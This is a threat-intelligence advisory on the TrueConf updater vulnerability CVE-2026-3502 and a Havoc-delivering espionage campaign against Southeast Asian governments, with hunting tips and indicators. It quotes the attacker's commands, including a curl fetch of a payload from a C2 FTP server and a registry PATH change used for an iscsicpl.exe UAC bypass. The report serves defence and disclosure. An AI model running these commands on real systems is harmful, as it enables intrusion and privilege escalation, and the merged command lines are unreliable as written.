Key Points

• Check Point Research identified a zero-day vulnerability in the TrueConf client application, tracked as CVE-2026-3502, with a CVSS score of 7.8. The flaw stems from the abuse of TrueConf’s updater validation mechanism, allowing an attacker who controls the on-premises TrueConf server to distribute and execute arbitrary files across all connected endpoints.
• This vulnerability has been exploited in-the-wild as part of a targeted campaign we call “TrueChaos” against government entities in Southeast Asia, where the threat actor abused the TrueConf update mechanism to deploy the Havoc payload to vulnerable machines.
• Based on the observed TTPs, command and control infrastructure and victimology, we assess with moderate confidence that this activity is associated with a Chinese-nexus threat actor.
• Check Point Research responsibly disclosed this vulnerability to TrueConf. Following our notification, the vendor developed a fix, which is included in the TrueConf Windows client starting with version 8.5.3, which was released in March 2026. The current version of the desktop apps is 8.5.2.

Introduction

At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment. The investigation led to the discovery of a zero-day vulnerability in the TrueConf client, tracked as CVE-2026-3502 with a CVSS score of 7.8. The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints.

TrueConf is a video conferencing platform that supports both on-premises and cloud deployments and is used across multiple regions, most prominently in Russia, as well as in East Asia, Europe, and the Americas. Serving more than 100,000 organisations globally, their global customers range from key governments and defense departments and critical infrastructure industries to significant businesses such as banks, power and TV stations. In enterprise environments, its on-premises architecture creates a trusted relationship between the central server and connected clients, especially through the platform’s update mechanism.

Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection. It is primarily used by government, military, and critical infrastructure sectors to ensure absolute data privacy and communication autonomy in secure or remote environments. In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems.

In this particular case, that trust was abused to deliver malware due to improper validation in the update process. In the observed in-the-wild activity, operation “TrueChaos”, the threat actor used the trusted update channel of a centrally managed on-premises TrueConf server to distribute malicious updates to multiple connected government agencies in a South Eastern country.

The victimology and regional focus of the campaign suggest an espionage-motivated operation. In combination with the observed TTPs and command-and-control infrastructure, these indicators point with moderate confidence to a Chinese-nexus threat actor.

About TrueConf

TrueConf is a video conferencing platform that supports both on-premises and cloud deployments. Although it is most widely used in Russia, it also has a notable presence across parts of East Asia, Europe, and the Americas. To better understand the potential scope of the vulnerability, we reviewed internet exposed TrueConf servers to assess the platform’s geographic distribution and the possible reach of the attack. This view is necessarily incomplete, as many TrueConf deployments may operate entirely in on-premises environments and remain inaccessible from the public internet.

CVE-2026-3502 Root Cause Analysis

When the TrueConf client starts, it checks the connected on-premises server for available updates. If the server has a newer client version than the one installed, the application prompts the user to download the update from https://{trueconf_server}/downlods/trueconf_client.exe, which maps to the file stored on the server under C:\Program Files\TrueConf Server\ClientInstFiles\.

TrueConf client update starts when the client detects a version mismatch in favor of the TrueConf on-premises server, the client alerts the user that a newer version is available and offers to download it.

The vulnerability stems from the lack of integrity and authenticity checks in this update flow. An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients. Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update.

In-The-Wild Exploitation

The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.

Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process.

The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update.

Analysis of the downloaded package showed that it was a weaponized client update. The installation was built by Inno Setup. It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2. Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe executable and a malicious 7z-x64.dll file to the path c:\programdata\poweriso\, which was then loaded through DLL side-loading.

Using the malicious 7z-x64.dll implant, the attacker performed a series of hands-on-keyboard actions focused on reconnaissance, environment preparation, persistence, and the retrieval of additional payloads.

• Initial reconnaissance included commands such as:
  • tasklist > cache
  • tracert 8.8.8.8 -h 5
• Downloaded from the FTP server an additional loader isciexe.dll, and extract it to the %temp% directory:
  • curl -u ftpuser:<redacted> ftp://47.237.15[.]197/update.7z -o c:\program files\winrar\winrar.exe x update.7z -p <redacted>
• The attacker then modified the current user’s PATH variable, in order to preform UAC bypass by using the Microsoft iSCSI Initiator Control Panel tool:
  • reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\<redacted>\appdata\local\temp" /f c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe

iscsicpl.exe is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64 version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll. By placing a malicious iscsiexe.dll in a user-controlled location referenced through the user’s %PATH%, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe, resulting in privilege escalation without a UAC prompt.

The downloaded update.7z archive contained a legitimate 7z.exe binary alongside iscsiexe.dll, a component used by the attackers as part of the post-compromise workflow. Check Point Research also identified additional variants of the archive that included an encrypted 7z archive named rom.dat. At the time of analysis, the contents and purpose of rom.dat remained unclear.

The iscsiexe.dll component appears to be a simple, custom persistence and privilege escalation tool. Rather than serving as a full-featured backdoor, its role was limited to maintaining execution of winexec.exe, which is the renamed poweriso.exe binary dropped earlier in the infection chain.

Although Check Point Research did not recover the exact final-stage payload associated with the malicious 7z-x64.dll activity, it observed network communication to 47.237.15[.]197, an attacker-controlled server running Havoc C2 infrastructure, and also identified Havoc demon sample linked to actor C2 infrastructure. Based on this combined evidence, Check Point Research assesses with high confidence that the missing payload was a Havoc implant.

Havoc is an open-source post-exploitation framework intended for penetration testing and adversary emulation, but it has also been repeatedly abused by threat actors in real-world intrusions, including Chinese-nexus Amaranth Dragon activity recently documented by Check Point Research.

Attribution

Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor. The assessment is based on a combination of factors, including TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure and the victimology aligns with Chinese nexus strategic interests.

We also observed that the same victim was targeted within the same time frame by ShadowPad malware framework. This may indicate overlap in operator tooling, shared access, or the presence of multiple China-aligned actors targeting the same organization in parallel.

Conclusion

The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually. Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks.

From a research perspective, this case shows how monitoring and analysing routine execution techniques can uncover far more significant threats. What initially appeared to be a signed binary used for DLL sideloading ultimately led to the discovery of a zero-day vulnerability in TrueConf’s update validation mechanism.

Hunting Recommendations

In order to identify whether you have been compromised, review the following indicators and hunting opportunities across the affected system: 

• Check whether trueconf_windows_update.exe is unsigned, as an unsigned update executable may indicate that the file is suspicious or has been tampered with.
• Treat the system as potentially infected if C:\ProgramData\PowerISO\poweriso.exe is present on disk, especially if this file is not expected in your environment.
• Treat the system as potentially infected if the registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck points to C:\ProgramData\PowerISO\PowerISO.exe, as this indicates persistence through a user logon autorun entry.
• Treat the system as potentially infected if files such as %AppData%\Roaming\Adobe\update.7z, 7za.exe, iscsiexe.dll, or rom.dat are present, or if there is evidence that they were recently created and then deleted.
• Hunt for file creation activity in which trueconf_windows_update.tmp creates C:\ProgramData\PowerISO\poweriso.exe or 7z-x64.dll, as this behavior is consistent with the observed delivery chain.
• Hunt for poweriso.exe spawning commands through cmd.exe, particularly when the command line includes tools or utilities such as curl, winrar.exe, or netstat, since this may indicate download, extraction, or discovery activity.
• Hunt for the suspicious parent-child process chain trueconf.exe -> trueconf_windows_update.exe -> trueconf_windows_update.tmp -> any executable, as this sequence may reveal execution of the malicious payload.

Indicators of Compromise

trueconf_windows_update.exe – Malicious TrueConf client update
22e32bcf113326e366ac480b077067cf

iscsiexe.dll – Loader
9b435ad985b733b64a6d5f39080f4ae0

7z-x64.dll – Havoc implant
248a4d7d4c48478dcbeade8f7dba80b3

43.134.90[.]60 – Havoc C2
43.134.52[.]221 – Havoc C2
47.237.15[.]197 – Havoc C2